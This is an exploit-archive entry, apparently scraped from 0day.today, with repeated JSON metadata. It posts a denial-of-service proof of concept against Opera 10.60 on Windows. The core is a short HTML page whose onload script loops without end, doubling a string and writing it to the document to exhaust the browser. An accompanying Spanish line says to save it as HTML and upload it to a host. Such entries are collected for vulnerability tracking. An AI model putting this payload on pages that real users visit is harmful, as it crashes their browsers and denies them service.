ID 1337DAY-ID-13182
Type zdt
Reporter PoisonCode
Modified 2010-07-06T00:00:00
Description
Exploit for windows platform in category dos / poc
======================================
Opera Exploit v10.60 Denial of Service
======================================
# Author: PoisonCode
# Download Exploit Code
# Download Vulnerable app
# Title:OperaRemote Dos
# Software Link:http://www.opera.com
# Version: v10.60
# Platform:Windows
# Author: PoisonCode
# CVE-ID:()
_____ _____ _ _
| __ \ / ____| (_) |
| |__) | (___ ___ ___ _ _ _ __ _| |_ _ _
| ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| | ____) | __/ (__| |_| | | | | |_| |_| |
|_| |_____/ \___|\___|\__,_|_| |_|\__|\__, |
__/ |
|___/
Lo Guardamos como un html y lo subimos algun host
Exploit
-----------------------------------------
<body onload="javascript:Dos();"></body>
<script>
function Dos() {
var b = '\x00\x13\xE8\x7C\x00\x13\xE8\90\x00\x13\xEC\0C';
for (a =0;a<99999999999;a++) {
b+=b+'\x00\x13\xE8\x7C\x00\x13\xE8\90\x00\x13\xEC\0C';
document.write('<html><marquee><h1>'+b+b);
}
}
</script>
# 0day.today [2018-01-01] #
{"id": "1337DAY-ID-13182", "bulletinFamily": "exploit", "title": "Opera Exploit v10.60 Denial of Service", "description": "Exploit for windows platform in category dos / poc", "published": "2010-07-06T00:00:00", "modified": "2010-07-06T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/13182", "reporter": "PoisonCode", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-01-01T23:03:25", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for windows platform in category dos / poc", "edition": 1, "enchantments": {"score": {"modified": "2016-04-20T01:37:13", "value": 5.0}}, "hash": "9295cd83cfcb30991eb9d7d083a5413c038e7d84852179d38ba656175665c85a", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "36b65c79358fe74cf5ecdc7f7e829614", "key": "modified"}, {"hash": "c43da8ba8a454c510838e0cc757d4875", "key": "href"}, {"hash": "36b65c79358fe74cf5ecdc7f7e829614", "key": "published"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "96150d5d8e3c4dc44170d7b128121eff", "key": "reporter"}, {"hash": "b0d3d3a91f21189719037cf41ad6dbfa", "key": "description"}, {"hash": "6bc10ea59a8ebc047972a386e1d3e7e5", "key": "sourceHref"}, {"hash": "4fa338714272c7e38a2d0f689d3d1aa4", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "300d1edf69333741c6d48b89dd45b1f7", "key": "sourceData"}], "history": [], "href": "http://0day.today/exploit/description/13182", "id": "1337DAY-ID-13182", "lastseen": "2016-04-20T01:37:13", "modified": "2010-07-06T00:00:00", "objectVersion": "1.0", "published": "2010-07-06T00:00:00", "references": [], "reporter": "PoisonCode", "sourceData": "======================================\r\nOpera Exploit v10.60 Denial of Service\r\n======================================\r\n\r\n\r\n# Author: PoisonCode\r\n# Download Exploit Code\r\n# Download Vulnerable app\r\n# Title:OperaRemote Dos\r\n# Software Link:http://www.opera.com\r\n# Version: v10.60\r\n# Platform:Windows\r\n# Author: PoisonCode\r\n# CVE-ID:()\r\n\r\n_____ _____ _ _\r\n| __ \\ / ____| (_) |\r\n| |__) | (___ ___ ___ _ _ _ __ _| |_ _ _\r\n| ___/ \\___ \\ / _ \\/ __| | | | '__| | __| | | |\r\n| | ____) | __/ (__| |_| | | | | |_| |_| |\r\n|_| |_____/ \\___|\\___|\\__,_|_| |_|\\__|\\__, |\r\n__/ |\r\n|___/\r\n\r\n\r\nLo Guardamos como un html y lo subimos algun host\r\n\r\nExploit\r\n-----------------------------------------\r\n\r\n<body onload=\"javascript:Dos();\"></body>\r\n\r\n<script>\r\n\r\nfunction Dos() {\r\n\r\nvar b = '\\x00\\x13\\xE8\\x7C\\x00\\x13\\xE8\\90\\x00\\x13\\xEC\\0C';\r\nfor (a =0;a<99999999999;a++) {\r\nb+=b+'\\x00\\x13\\xE8\\x7C\\x00\\x13\\xE8\\90\\x00\\x13\\xEC\\0C';\r\ndocument.write('<html><marquee><h1>'+b+b);\r\n\r\n}\r\n\r\n}\r\n\r\n</script>\r\n\r\n\n\n# 0day.today [2016-04-20] #", "sourceHref": "http://0day.today/exploit/13182", "title": "Opera Exploit v10.60 Denial of Service", "type": "zdt", "viewCount": 0}, "differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:37:13"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "b0d3d3a91f21189719037cf41ad6dbfa"}, {"key": "href", "hash": "90c13200cd5f2a3ce805c156ff8bfc5a"}, {"key": "modified", "hash": "36b65c79358fe74cf5ecdc7f7e829614"}, {"key": "published", "hash": "36b65c79358fe74cf5ecdc7f7e829614"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "96150d5d8e3c4dc44170d7b128121eff"}, {"key": "sourceData", "hash": "14347aef4ab26e3ce9a931ff8cfd26b0"}, {"key": "sourceHref", "hash": "e2ce7623d6b24fa55cb190d1380bd299"}, {"key": "title", "hash": "4fa338714272c7e38a2d0f689d3d1aa4"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "2e878515129a5f2a3542d59e3edbc7cd3620e8576aaef1f003dddd85a3881e8e", "viewCount": 0, "enchantments": {"vulnersScore": 5.0}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/13182", "sourceData": "======================================\r\nOpera Exploit v10.60 Denial of Service\r\n======================================\r\n\r\n\r\n# Author: PoisonCode\r\n# Download Exploit Code\r\n# Download Vulnerable app\r\n# Title:OperaRemote Dos\r\n# Software Link:http://www.opera.com\r\n# Version: v10.60\r\n# Platform:Windows\r\n# Author: PoisonCode\r\n# CVE-ID:()\r\n\r\n_____ _____ _ _\r\n| __ \\ / ____| (_) |\r\n| |__) | (___ ___ ___ _ _ _ __ _| |_ _ _\r\n| ___/ \\___ \\ / _ \\/ __| | | | '__| | __| | | |\r\n| | ____) | __/ (__| |_| | | | | |_| |_| |\r\n|_| |_____/ \\___|\\___|\\__,_|_| |_|\\__|\\__, |\r\n__/ |\r\n|___/\r\n\r\n\r\nLo Guardamos como un html y lo subimos algun host\r\n\r\nExploit\r\n-----------------------------------------\r\n\r\n<body onload=\"javascript:Dos();\"></body>\r\n\r\n<script>\r\n\r\nfunction Dos() {\r\n\r\nvar b = '\\x00\\x13\\xE8\\x7C\\x00\\x13\\xE8\\90\\x00\\x13\\xEC\\0C';\r\nfor (a =0;a<99999999999;a++) {\r\nb+=b+'\\x00\\x13\\xE8\\x7C\\x00\\x13\\xE8\\90\\x00\\x13\\xEC\\0C';\r\ndocument.write('<html><marquee><h1>'+b+b);\r\n\r\n}\r\n\r\n}\r\n\r\n</script>\r\n\r\n\n\n# 0day.today [2018-01-01] #"}
{"result": {}}